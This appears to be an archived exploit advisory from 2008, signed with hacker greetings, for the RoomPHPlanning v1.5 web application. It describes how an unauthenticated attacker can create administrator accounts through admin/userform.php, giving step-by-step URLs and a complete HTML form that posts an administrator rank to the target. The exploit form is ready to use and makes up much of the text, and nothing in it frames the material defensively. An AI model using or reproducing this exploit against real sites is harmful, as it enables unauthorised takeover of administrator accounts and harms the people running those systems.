64 lines
No EOL
2.5 KiB
Text
64 lines
No EOL
2.5 KiB
Text
###########################################
|
|
{+} RoomPHPlanning v1.5 remote Arbitrary Add Admin Users Vulnerability
|
|
{+} Script download :http://www.beaussier.com/roomphplanning/telecharge.php
|
|
{+} Founded by : Stack
|
|
{+} Greetz : All friends & muslims HaCkeRs...
|
|
###########################################
|
|
DESCRIPTION:
|
|
RoomPHPlanning is vulnerable to add user whit go to link [see down]
|
|
in colon Nom write any name and in colon login whrite your adress email after password
|
|
and the colon priviléges is adminstrator after click [enregistrer ]
|
|
Vulnerability:
|
|
go to this link for add admin user
|
|
1 : http://localhost/path/admin/userform.php
|
|
go this link for login in
|
|
2 : http://localhost/path/login.php
|
|
after login in go to admin link
|
|
3 : http://localhost/path/admin/
|
|
for see all administrator & edit it
|
|
4 : http://localhost/path/admin/?user=1
|
|
after execute the command for add user or for login in the page is not changed
|
|
it's necessary go to second link 1 2 3 4
|
|
|
|
EXPLOIT HTML :
|
|
-------------------------------------------------------------------------------------
|
|
<HTML>
|
|
<HEAD>
|
|
<TITLE>RoomPHPlanning add Admin user</TITLE>
|
|
<LINK REL="stylesheet" TYPE="text/css" HREF="style.css">
|
|
</HEAD>
|
|
<BODY>
|
|
<form action="http://site.com/path/admin/userform.php" method="POST">
|
|
<FORM ACTION="#" METHOD="POST">
|
|
<INPUT TYPE="HIDDEN" NAME="save" VALUE="1">
|
|
<TABLE WIDTH=98% BORDER=0 CELLPADDING=4 CELLSPACING=0>
|
|
<TR VALIGN=TOP>
|
|
<TD WIDTH=50%><P>Nom</P></TD>
|
|
<TD WIDTH=50%><INPUT TYPE=TEXT NAME='name' SIZE=40 VALUE=""></TD>
|
|
<TR VALIGN=TOP>
|
|
<TD WIDTH=50%><P>Login email</P></TD>
|
|
<TD WIDTH=50%><INPUT TYPE=TEXT NAME='login' SIZE=40 VALUE=""></TD>
|
|
<TR VALIGN=TOP>
|
|
<TD WIDTH=50%><P>Mot de passe</P></TD>
|
|
<TD WIDTH=50%><INPUT TYPE=TEXT NAME='pwd' SIZE=20></TD></TR>
|
|
</TR><TR VALIGN=TOP>
|
|
<TD WIDTH=50%><P>Privilèges</P></TD><TD WIDTH=50%><SELECT NAME="rank">
|
|
<OPTION VALUE="1">Administrateur</OPTION>
|
|
<OPTION VALUE="2">Utilisateur de base</OPTION>
|
|
<OPTION VALUE="3">Utilisateur normal</OPTION>
|
|
<OPTION VALUE="4">Anonyme</OPTION>
|
|
<OPTION VALUE="5">Super utilisateur</OPTION>
|
|
<OPTION VALUE="6">Gestionnaire</OPTION>
|
|
</SELECT>
|
|
</TD>
|
|
</TR><TR><TD COLSPAN=2 WIDTH=100% VALIGN=TOP><CENTER><BR>
|
|
<INPUT TYPE="SUBMIT" VALUE="Enregistrer">
|
|
<INPUT TYPE="BUTTON" VALUE="Annuler" ONCLICK="javascript:window.close();">
|
|
</TD></TR></TABLE></FORM></BODY>
|
|
</HTML>
|
|
-------------------------------------------------------------------------------------
|
|
|
|
GREETZ: http://real-hack.com
|
|
-----------------------------------------------------------------------------
|
|
|
|
# milw0rm.com [2008-05-26] |